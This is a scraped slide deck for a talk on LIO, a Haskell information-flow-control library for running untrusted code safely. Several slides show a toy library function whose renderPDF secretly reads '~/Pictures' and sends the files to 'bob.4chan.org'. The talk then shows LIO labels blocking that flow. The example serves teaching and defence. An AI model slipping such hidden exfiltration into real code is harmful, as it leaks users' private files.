Building secure systems with LIO Deian Stefan, Amit Levy, Alejandro - - PowerPoint PPT Presentation

building secure systems with lio
SMART_READER_LITE
LIVE PREVIEW

Building secure systems with LIO Deian Stefan, Amit Levy, Alejandro - - PowerPoint PPT Presentation

Jan 18, 2024 443 likes •693 views

Building secure systems with LIO Deian Stefan, Amit Levy, Alejandro Russo and David Mazires Building systems is hard. if ((err = SSLHashSHA1.upda goto fail; if ((err = SSLHashSHA1.upda goto fail; goto fail; if ((err = SSLHashSHA1.fina

slide-1
SLIDE 1

Building secure systems with LIO

Deian Stefan, Amit Levy, Alejandro Russo and David Mazières

slide-2
SLIDE 2

Building systems is hard.

slide-3
SLIDE 3

Building secure systems is harder.

  • if ((err = SSLHashSHA1.upda

goto fail; if ((err = SSLHashSHA1.upda goto fail; goto fail; if ((err = SSLHashSHA1.fina goto fail;

slide-4
SLIDE 4

Safe Haskell to the rescue!

slide-5
SLIDE 5

Kind of…

slide-6
SLIDE 6

cabal install your-cool-lib

slide-7
SLIDE 7

{-# LANGUAGE Safe #-} module YourCoolLib where

  • ...
  • renderPDF :: Text -> IO PDF

renderPDF txt = do pics <- readFiles “~/Pictures” sendFiles pics “bob.4chan.org” _renderPDF txt ...

slide-8
SLIDE 8

{-# LANGUAGE Safe #-} module YourCoolLib where

  • ...
  • renderPDF :: Text -> IO PDF

renderPDF txt = do pics <- readFiles “~/Pictures” sendFiles pics “bob.4chan.org” _renderPDF txt

slide-9
SLIDE 9

But, I don’t execute untrusted code!

slide-10
SLIDE 10

You do: 83% of CVEs are in application code

slide-11
SLIDE 11

Should treat most of your code as untrusted ➠ address one problem!

slide-12
SLIDE 12

Safely executing untrusted code

  • Approach: information control flow (IFC)

➤ Associate security policy with data ➤ Enforce that all code abides by data policy

  • Result: data confidentiality and integrity
slide-13
SLIDE 13

Policy specification with DCLabels (demo)

slide-14
SLIDE 14

{-# LANGUAGE Safe #-} module YourCoolLib where

  • ...
  • renderPDF :: Text -> LIO PDF

renderPDF txt = do pics <- readFiles “~/Pictures” sendFiles pics “bob.4chan.org” _renderPDF txt

slide-15
SLIDE 15

{-# LANGUAGE Safe #-} module YourCoolLib where

  • ...
  • renderPDF :: Text -> LIO PDF

renderPDF txt = do pics <- readFiles “~/Pictures” sendFiles pics “bob.4chan.org” _renderPDF txt

alice canFlowTo bob.4chan.org?

slide-16
SLIDE 16

Enforcement with simplified LIO (demo)

slide-17
SLIDE 17

But real apps require some form

  • f information release…
slide-18
SLIDE 18

{-# LANGUAGE Safe #-} module ICloudLib where

  • ...
  • backup :: DCPriv -> LIO ()

backup alicePriv = do pics <- readFiles “~/Pictures” sendFilesP alicePriv pics “upload.icloud.com”

slide-19
SLIDE 19

Other LIO features

  • LIORefs, LChans, LMVars, etc.
  • Threads
  • Exceptions
  • File system
  • Database system
  • HTTP server & client
slide-20
SLIDE 20

Other LIO features

  • LIORefs, LChans, LMVars, etc.
  • Threads
  • Exceptions
  • File system
  • Database system
  • HTTP server & client

…port your own!

slide-21
SLIDE 21

Challenge: policy specification

  • LIO ensures that code cannot violate IFC
  • DCLabels is a simple label model
  • But to ensure security, still must:

➤ Set the correct policy ➤ Structure app code to minimize use of privileges

slide-22
SLIDE 22

Challenge: policy specification

  • LIO ensures that code cannot violate IFC
  • DCLabels is a simple label model
  • But to ensure security, still must:

➤ Set the correct policy ➤ Structure app code to minimize use of privileges

… this is hard, but we have some ideas!

slide-23
SLIDE 23

We built multiple systems…
 
 give it a shot!

cabal install lio

LearnByHacking - School of Haskell clone GitStar - GitHub platform clone LambdaChair - Conference review system Blog, wiki, auth server, commenting system, …

www.labeled.io